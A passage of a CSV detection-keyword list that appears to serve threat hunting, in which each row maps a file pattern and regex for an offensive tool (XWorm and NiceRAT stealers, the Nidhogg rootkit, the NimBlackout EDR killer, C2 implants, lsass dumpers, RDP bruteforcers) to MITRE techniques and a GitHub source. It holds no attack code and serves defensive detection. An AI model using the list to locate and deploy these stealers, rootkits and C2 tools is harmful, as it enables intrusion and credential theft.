Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Ngrok-Disk.dll*",".{0,1000}\/Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Ngrok-Install.dll*",".{0,1000}\/Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - 
TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/NiceRAT.git*",".{0,1000}\/NiceRAT\.git.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/NiceRAT.py*",".{0,1000}\/NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/NiceRAT-1.0.0.zip*",".{0,1000}\/NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/nidem/kerberoast*",".{0,1000}\/nidem\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*/Nidhogg.cpp*",".{0,1000}\/Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - 
T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.exe*",".{0,1000}\/Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.git*",".{0,1000}\/Nidhogg\.git.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - 
T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/Nidhogg.zip*",".{0,1000}\/Nidhogg\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/NidhoggClient.exe*",".{0,1000}\/NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple 
to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*/NidhoggClient/*",".{0,1000}\/NidhoggClient\/.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*/nightCrawler.ps1*",".{0,1000}\/nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/Nightmangle.git*",".{0,1000}\/Nightmangle\.git.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/nikto.git*",".{0,1000}\/nikto\.git.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense
Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","291","38","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" "*/nimcrypt.nim*",".{0,1000}\/nimcrypt\.nim.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/nimcrypt/*",".{0,1000}\/nimcrypt\/.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter 
written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/Nimcrypt2*",".{0,1000}\/Nimcrypt2.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*/NimDllSideload.git*",".{0,1000}\/NimDllSideload\.git.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/NimDllSideload/*",".{0,1000}\/NimDllSideload\/.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/NimExec.git*",".{0,1000}\/NimExec\.git.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*/Nimperiments.git*",".{0,1000}\/Nimperiments\.git.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" 
"*/NimPlant.*",".{0,1000}\/NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/NimPlant/*",".{0,1000}\/NimPlant\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/nimplants/*",".{0,1000}\/nimplants\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*/nimproxydll.git*",".{0,1000}\/nimproxydll\.git.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/nimproxydll/*",".{0,1000}\/nimproxydll\/.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/ninja.crt*",".{0,1000}\/ninja\.crt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.git*",".{0,1000}\/Ninja\.git.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ninja.key*",".{0,1000}\/ninja\.key.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.py*",".{0,1000}\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/nipe.git",".{0,1000}\/nipe\.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*/nipe.pl",".{0,1000}\/nipe\.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*/nishang*",".{0,1000}\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads 
which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/nishang/*",".{0,1000}\/nishang\/.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/nje-node-brute.nse*",".{0,1000}\/nje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nje-pass-brute.nse*",".{0,1000}\/nje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NLBrute*.rar*",".{0,1000}\/NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/NLBrute*.zip*",".{0,1000}\/NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/NLBrute.exe*",".{0,1000}\/NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*/nmap.py*",".{0,1000}\/nmap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/nmap_smb_scan_all_*.txt*",".{0,1000}\/nmap_smb_scan_all_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/nntp-ntlm-info.nse*",".{0,1000}\/nntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NoArgs.exe*",".{0,1000}\/NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*/NoArgs.git*",".{0,1000}\/NoArgs\.git.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*/No-Consolation.git*",".{0,1000}\/No\-Consolation\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*/Nofault.exe*",".{0,1000}\/Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/NoFilter.cpp*",".{0,1000}\/NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.exe*",".{0,1000}\/NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.git*",".{0,1000}\/NoFilter\.git.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.sln*",".{0,1000}\/NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.vcxproj*",".{0,1000}\/NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
